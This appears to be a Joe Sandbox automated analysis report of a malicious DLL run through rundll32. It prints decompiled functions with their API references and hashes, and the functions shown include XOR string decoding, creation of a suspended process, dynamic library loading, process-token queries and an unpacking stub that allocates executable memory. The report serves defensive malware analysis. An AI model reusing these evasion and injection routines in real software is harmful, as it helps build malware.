0x1000d07a
0x1000d080
0x1000d087

APIs

Part of subcall function 100096BF: memset.MSVCRT ref: 100096D1

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 1000D07A

Strings

D, xrefs: 1000D05E

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: CreateProcessmemset
String ID: D
API String ID: 2296119082-2746444292
Opcode ID: 08a68ca6bed26796d2f65aae0e32a790fb89cb291b57576b5f3120a1785990cd
Instruction ID: d27b247edd7bdbe7ca00ef79e088292ca0cbd604f99a00e4c77ad78c7c6d32b5
Opcode Fuzzy Hash: 08a68ca6bed26796d2f65aae0e32a790fb89cb291b57576b5f3120a1785990cd
Instruction Fuzzy Hash: 29F065F26402183EF720E6A5CC0AFBF3AACCB81750F500025BF05EB1D1E6A0BD0582B5

Uniqueness

Uniqueness Score: -1.00%

Function 1000A0E3 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E1000A0E3(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v24;
				short _v40;
				void* _t24;
				signed int _t33;
				intOrPtr _t39;
				signed int _t40;
				signed int _t41;
				intOrPtr _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				signed int _t52;
				signed int _t55;
				void* _t57;
				void* _t58;

				_t49 = __edx;
				_t52 = _a12;
				_t39 = __ecx;
				_v8 = __ecx;
				_t55 = _t52;
				if(_t52 >= __edx) {
					L4:
					_t40 = 0x10020e3a;
					L5:
					_t44 = 0;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsw");
					asm("movsb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_t24 = 0;
					if(_v24 == 0) {
						L8:
						_t50 = _t24;
						if(_t50 == 0) {
							L10:
							lstrlenW( &_v40);
							return _t40;
						} else {
							goto L9;
						}
						do {
							L9:
							_t11 = _t44 + 0x30; // 0x30
							 *((char*)(_t58 + _t44 - 0x24)) = _t11;
							_t44 = _t44 + 1;
						} while (_t44 < _t50);
						goto L10;
					} else {
						goto L6;
					}
					do {
						L6:
						_t24 = _t24 + 1;
					} while ( *((intOrPtr*)(_t58 + _t24 - 0x14)) != 0);
					_t50 = 0xe;
					if(_t24 > _t50) {
						goto L9;
					}
					goto L8;
				}
				_t45 = _a4;
				while( *((intOrPtr*)((_t55 & 0x0000007f) + _t45)) !=  *((intOrPtr*)(_t55 + _t39))) {
					_t55 = _t55 + 1;
					if(_t55 < _t49) {
						continue;
					}
					goto L4;
				}
				_t57 = _t55 - _t52;
				if(_t57 == 0) {
					goto L4;
				}
				_t33 = E10009525(_t57 + 1); // executed
				_t41 = _t33;
				_a12 = _t41;
				if(_t41 != 0) {
					_t51 = _a4;
					_t42 = _v8;
					_t48 = _t41 - _t52;
					do {
						 *(_t48 + _t52) =  *((_t52 & 0x0000007f) + _t51) ^  *(_t52 + _t42);
						_t52 = _t52 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					_t40 = _a12;
					goto L5;
				}
				return 0x10020e3a;
			}

0x1000a0e3
0x1000a0ec
0x1000a0ef
0x1000a0f1
0x1000a0f4
0x1000a0f8
0x1000a10f
0x1000a10f
0x1000a114
0x1000a11e
0x1000a120
0x1000a121
0x1000a122
0x1000a123
0x1000a125
0x1000a129
0x1000a12a
0x1000a12b
0x1000a12c
0x1000a12e
0x1000a12f
0x1000a134
0x1000a144
0x1000a144
0x1000a148
0x1000a156
0x1000a15a
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a14a
0x1000a14a
0x1000a14a
0x1000a14d
0x1000a151
0x1000a152
0x00000000
0x00000000
0x00000000
0x00000000
0x1000a136
0x1000a136
0x1000a136
0x1000a137
0x1000a13f
0x1000a142
0x00000000
0x00000000
0x00000000
0x1000a142
0x1000a0fa
0x1000a0fd
0x1000a10a
0x1000a10d
0x00000000
0x00000000
0x00000000
0x1000a10d
0x1000a167
0x1000a169
0x00000000
0x00000000
0x1000a16f
0x1000a174
0x1000a176
0x1000a17c
0x1000a185
0x1000a18a
0x1000a18d
0x1000a18f
0x1000a19a
0x1000a19d
0x1000a19e
0x1000a19e
0x1000a1a3
0x00000000
0x1000a1a3
0x00000000

APIs

lstrlenW.KERNEL32(?,00000140,?,1001D948), ref: 1000A15A

Strings

GetCurrentPath, xrefs: 1000A114

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: lstrlen
String ID: GetCurrentPath
API String ID: 1659193697-3283422198
Opcode ID: 2777c302878e743329928b62ca6cdf5358687e0bb5186423c77c95a66ef2c9a1
Instruction ID: 41195c9a76874d14623ff530a364872f8f15e9d536d7495008c0b386dd41cbd3
Opcode Fuzzy Hash: 2777c302878e743329928b62ca6cdf5358687e0bb5186423c77c95a66ef2c9a1
Instruction Fuzzy Hash: 1F212B31B046966FEB01DEACC8804DEBBB7EB4F2C0B654679E981DB205D571DD868390

Uniqueness

Uniqueness Score: -1.00%

Function 693414E1 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C

Strings

u, xrefs: 69341708

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID: u
API String ID: 1263568516-1900653220
Opcode ID: e7a28eba2dc39247f65bfde7425fb5c6f5839e8c1731000680f5a306d40636bd
Instruction ID: 2167eb4b5afe2dc35e97cf936b047b4391e249a91e34a5e8835b39a7dfedc68b
Opcode Fuzzy Hash: e7a28eba2dc39247f65bfde7425fb5c6f5839e8c1731000680f5a306d40636bd
Instruction Fuzzy Hash: 92113976A58508EFCF50CFC8C880A9DBBF9FB2A790F124051E905AA260C335DE309B60

Uniqueness

Uniqueness Score: -1.00%

Function 69341700 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C

Strings

u, xrefs: 69341708

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID: u
API String ID: 1263568516-1900653220
Opcode ID: 9899821b38d012ef4f8d6ba8ffa66c666ba76c3b7eb254230103bfa44ee9009c
Instruction ID: 9d554ff6eec78cd0fbfa07987818fa2f8c261e5ca8ef9e3c010c7ec9449f3ada
Opcode Fuzzy Hash: 9899821b38d012ef4f8d6ba8ffa66c666ba76c3b7eb254230103bfa44ee9009c
Instruction Fuzzy Hash: 85115B76958509EFCF41CFC8C880A9EBBF9FB1A750F124051E905A6250C335DE20DB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000AB5A Relevance: 3.0, APIs: 2, Instructions: 44
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000AB5A(void* __ecx, void* __eflags) {
				char _v44;
				intOrPtr _t9;
				intOrPtr _t12;
				void* _t13;
				intOrPtr _t17;
				void* _t20;
				void* _t21;
				intOrPtr _t25;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t32;

				_t9 =  *0x10020d88; // 0x4a1fc98
				_t1 = _t9 + 0xac; // 0x9841f0da
				_t21 = __ecx;
				E1000B687( &_v44,  *_t1 + 7, __eflags);
				_t32 = 0;
				_t12 =  *0x10020d58; // 0x4a1f900
				_t13 =  *((intOrPtr*)(_t12 + 0xd4))(0, 0, 0,  &_v44, _t28, _t31, _t20);
				_t29 = _t13;
				if(_t29 != 0) {
					GetLastError();
					ResumeThread( *(_t21 + 4));
					_t17 =  *0x10020d58; // 0x4a1f900
					_push(0x2710);
					_push(_t29);
					if( *((intOrPtr*)(_t17 + 0x30))() == 0) {
						_t32 = 1;
					}
					_t25 =  *0x10020d58; // 0x4a1f900
					 *((intOrPtr*)(_t25 + 0x34))(_t29);
					_t13 = _t32;
				}
				return _t13;
			}

0x1000ab5d
0x1000ab65
0x1000ab6d
0x1000ab76
0x1000ab7e
0x1000ab81
0x1000ab89
0x1000ab8f
0x1000ab93
0x1000ab95
0x1000aba3
0x1000aba9
0x1000abae
0x1000abb3
0x1000abb9
0x1000abbd
0x1000abbd
0x1000abbe
0x1000abc5
0x1000abc8
0x1000abc8
0x1000abce

APIs

GetLastError.KERNEL32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,10004FDB), ref: 1000AB95
ResumeThread.KERNELBASE(?,?,00000000,00000001,?,?,?,?,?,?,?,?,?,10004FDB), ref: 1000ABA3

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastResumeThread
String ID:
API String ID: 1307702467-0
Opcode ID: e0380292c89d61967faadc1e71b21dd2ed37e96ee2b958516c278971ba358e4a
Instruction ID: 22877a52fd125be6f021b278ba47e52bd49f4af4be482d09d273dff15349f24a
Opcode Fuzzy Hash: e0380292c89d61967faadc1e71b21dd2ed37e96ee2b958516c278971ba358e4a
Instruction Fuzzy Hash: E1018632201220AFD341DBD8CCC8DEA7FF9EF8D691B514165F905E7226D730E84287A0

Uniqueness

Uniqueness Score: -1.00%

Function 100098AE Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E100098AE(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E10009473(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xb6) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E10009863(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E1000A27E( &_v8);
				return _t25;
			}

0x100098b1
0x100098b4
0x100098ba
0x100098bc
0x100098c1
0x100098c3
0x100098cd
0x100098ce
0x100098dd
0x100098d0
0x100098d0
0x100098d0
0x100098e1
0x100098e8
0x100098ee
0x100098ee
0x100098f3
0x100098fe

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,00000001,1001D948,?,10001118,000000B6), ref: 100098D0
LoadLibraryA.KERNELBASE(00000000,00000000,?,00000001,1001D948,?,10001118,000000B6), ref: 100098DD

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: e14d05eb210316d018ccb2ba3b7b0576afc8d155a285a03db9c7ad15f5cfd033
Instruction ID: 0a8907e418d20bcaecb58a7887a8f175eb85e45bc48063aec8ac5069f05a84aa
Opcode Fuzzy Hash: e14d05eb210316d018ccb2ba3b7b0576afc8d155a285a03db9c7ad15f5cfd033
Instruction Fuzzy Hash: 57F0A731700214ABE704DFADDC8589EB7EDDF852D0710807AF806D7265DE70ED4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000A3EC Relevance: 3.0, APIs: 2, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A3EC() {
				struct HINSTANCE__* _t2;
				WCHAR* _t3;

				_t2 =  *0x10020e6c; // 0x0
				if(_t2 != 0) {
					FreeLibrary(_t2); // executed
					 *0x10020e6c =  *0x10020e6c & 0x00000000;
				}
				_t3 =  *0x10020e74; // 0x0
				if(_t3 != 0) {
					DeleteFileW(_t3);
					return E1000953B(0x10020e74, 0xfffffffe);
				}
				return _t3;
			}

0x1000a3ec
0x1000a3f3
0x1000a3f6
0x1000a3fc
0x1000a3fc
0x1000a403
0x1000a40a
0x1000a412
0x00000000
0x1000a425
0x1000a426

APIs

FreeLibrary.KERNELBASE(00000000,1000AA62,?,00000000,00000001), ref: 1000A3F6
DeleteFileW.KERNELBASE(00000000,1000AA62,?,00000000,00000001), ref: 1000A412

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: DeleteFileFreeLibrary
String ID:
API String ID: 547291962-0
Opcode ID: ca15c615ea0442b8dcceef320d0d966d6cbde59b05e70258221f303336b7117b
Instruction ID: 373ab761b7ea662e2ffe72f4665915744fcbba3f33783b47c61e70f7ed6e071f
Opcode Fuzzy Hash: ca15c615ea0442b8dcceef320d0d966d6cbde59b05e70258221f303336b7117b
Instruction Fuzzy Hash: D9E012716443115FFA40CF65EC89B6177EAEB452E1F228654F101D60B6CB71E8828B10

Uniqueness

Uniqueness Score: -1.00%

Function 693416C0 Relevance: 2.6, APIs: 2, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00008000,00008000), ref: 6934159C
VirtualAlloc.KERNELBASE(00001000,?,00001000,00000040,?,?), ref: 693416A3

Memory Dump Source

Source File: 0000000E.00000002.33863545872.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000E.00000002.33863518149.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863839229.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33863870637.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864047567.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864078936.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864107791.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000E.00000002.33864265674.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_69340000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: fc8711e6c9ffa4beb7937d2e50c3f5b96ec249011ccc69c36144253984d3254d
Instruction ID: ae356e0cce545ae758bd50a7af9da22c5e2a0fda8700733f7b09f1c099a92d89
Opcode Fuzzy Hash: fc8711e6c9ffa4beb7937d2e50c3f5b96ec249011ccc69c36144253984d3254d
Instruction Fuzzy Hash: A9316972A08919DFCF41CFD8C880BEEBBF5BF1A744F560051E911AB251C3369960DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 047D1AC8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000003.33834914479.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_47d0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bcfc43265826fb2468ab0714e424530cd57cdb6de9c70328cb8e27c4ef95002
Instruction ID: 61e3b5fc95f8f4649cbf46d81cc7512008153f812232f91c5dac7759a869b169
Opcode Fuzzy Hash: 0bcfc43265826fb2468ab0714e424530cd57cdb6de9c70328cb8e27c4ef95002
Instruction Fuzzy Hash: 4F615DB5E24208DFDB14DFA5D884BADB7B5EF08315FC8446AE90267352E734B980DB50

Uniqueness

Uniqueness Score: -1.00%

Function 047D1161 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000003.33834914479.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_47d0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382ac300e43c22af4d08a9d937eac035cafc2f83fc194c4d0399b387664a9422
Instruction ID: cdcf03e45bc840a72d295f71d0bf795fc938c86567c22d438c3500d71b3fe02b
Opcode Fuzzy Hash: 382ac300e43c22af4d08a9d937eac035cafc2f83fc194c4d0399b387664a9422
Instruction Fuzzy Hash: 1E31A8B5F24209EBEB21EF95CE84BAE7A75EB1C304FC50151E901A7752E2337A80D761

Uniqueness

Uniqueness Score: -1.00%

Function 1000E550 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000E550(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000E425(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000E47C(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E1000953B( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x10020d78; // 0x4a1fb48
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x10020d78; // 0x4a1fb48
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x10020d78; // 0x4a1fb48
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x1000e557
0x1000e559
0x1000e560
0x1000e562
0x1000e565
0x1000e56a
0x1000e56f
0x1000e579
0x1000e57c
0x1000e57f
0x1000e584
0x1000e586
0x1000e58c
0x1000e5ec
0x1000e5f4
0x1000e5fa
0x1000e601
0x1000e607
0x00000000
0x1000e608
0x1000e591
0x1000e592
0x1000e593
0x1000e594
0x1000e595
0x1000e596
0x1000e597
0x1000e598
0x1000e59d
0x1000e59f
0x1000e5a4
0x1000e5a5
0x1000e5af
0x00000000
0x00000000
0x1000e5b3
0x1000e5df
0x1000e5df
0x1000e5e7
0x1000e5ea
0x00000000
0x1000e5ea
0x1000e5b5
0x1000e5b5
0x1000e5b8
0x1000e5bb
0x1000e5bb
0x1000e5be
0x1000e5c0
0x1000e5ca
0x00000000
0x00000000
0x1000e5cf
0x1000e5d0
0x1000e5d3
0x1000e5d8
0x00000000
0x00000000
0x00000000
0x1000e5da
0x1000e5de
0x00000000
0x1000e5de
0x1000e60d

APIs

Part of subcall function 1000E425: GetCurrentThread.KERNEL32 ref: 1000E438
Part of subcall function 1000E425: OpenThreadToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E43F
Part of subcall function 1000E425: GetLastError.KERNEL32(?,?,1000E56A,00000000,10000000), ref: 1000E446
Part of subcall function 1000E425: OpenProcessToken.ADVAPI32(00000000,?,?,1000E56A,00000000,10000000), ref: 1000E46B

Part of subcall function 1000E47C: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000E4FD,00000000,00000000,?,1000E526), ref: 1000E497
Part of subcall function 1000E47C: GetLastError.KERNEL32(?,1000E4FD,00000000,00000000,?,1000E526,00001644,?,1000B2C2), ref: 1000E49E

FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000E5F4

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863406921.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863451634.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.33863486955.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_10000000_rundll32.jbxd

Similarity

API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
String ID:
API String ID: 1806447117-0
Opcode ID: aa8d589606b5220f078d07a6ead36c8afafdce5a0d430b0e1d324c349de55e11
Instruction ID: a5daf68a5848884b05e1b031ad6f812e530fc3d84fbea390b37ee7695869cd1c
Opcode Fuzzy Hash: aa8d589606b5220f078d07a6ead36c8afafdce5a0d430b0e1d324c349de55e11
Instruction Fuzzy Hash: 16217C71A00619AFEB00DFA9DC85AAEF7F8EF48781B104469F501E7265E730EE418B50

Uniqueness

Uniqueness Score: -1.00%

Function 047D0115 Relevance: 1.5, APIs: 1, Instructions: 49libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 047D0BF4

Memory Dump Source

Source File: 0000000E.00000003.33834914479.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_47d0000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8b2f8a9c19fb62d96504831496c34ceb0b85046b256d3e705a56a42eff2b5106
Instruction ID: c61d816b842eccd497a98b17a2f6e02173e71313cd0abdb21ec0efa94d64305c
Opcode Fuzzy Hash: 8b2f8a9c19fb62d96504831496c34ceb0b85046b256d3e705a56a42eff2b5106
Instruction Fuzzy Hash: 6211F370E28148CFCB18CF99C8A0AECBBB1EF08319F585099D056AB712D634AA40DF10

Uniqueness

Uniqueness Score: -1.00%

Function 047D06F8 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 047D0715

Memory Dump Source

Source File: 0000000E.00000003.33834914479.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_47d0000_rundll32.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 3f921a021b06faadadf04e1dd150e5bc554f80fc52f859d0b4c1867e9834f491
Instruction ID: 7d7b5e8ef6f654e157e34390bfa3d6c945280b6fdd7dc857d8bbabe66e6efaa9
Opcode Fuzzy Hash: 3f921a021b06faadadf04e1dd150e5bc554f80fc52f859d0b4c1867e9834f491
Instruction Fuzzy Hash: 53017875E24199DFEF14CF81C888ABDB7B1FB00318F44A496E4066B356E331A980EF10

Uniqueness

Uniqueness Score: -1.00%

Function 047D0BEF Relevance: 1.5, APIs: 1, Instructions: 10libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 047D0BF4

Memory Dump Source

Source File: 0000000E.00000003.33834914479.00000000047D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_3_47d0000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6f7a771a7bd6ec0b427a1a159c456b991fda65929091ba18c6b188f3352732bd
Instruction ID: 0fb7483eb5cf71379288d8360930257aea1d06678918aabb72dcb34b6c32c83f
Opcode Fuzzy Hash: 6f7a771a7bd6ec0b427a1a159c456b991fda65929091ba18c6b188f3352732bd
Instruction Fuzzy Hash: 84C04C3051114E96DF14EAA0D0547EE7775FB4030CF902055C056AAE52D631AA4BE750

Uniqueness

Uniqueness Score: -1.00%

Function 10001080 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001080() {
				intOrPtr _t3;

				_t3 =  *0x10020d58; // 0x4a1f900
				 *((intOrPtr*)(_t3 + 0x30))( *0x10020d54, 0xffffffff);
				ExitProcess(0);
			}

0x10001080
0x1000108d
0x10001097

APIs

ExitProcess.KERNEL32(00000000), ref: 10001097

Memory Dump Source

Source File: 0000000E.00000002.33863266505.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000E.00000002.33863244942.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
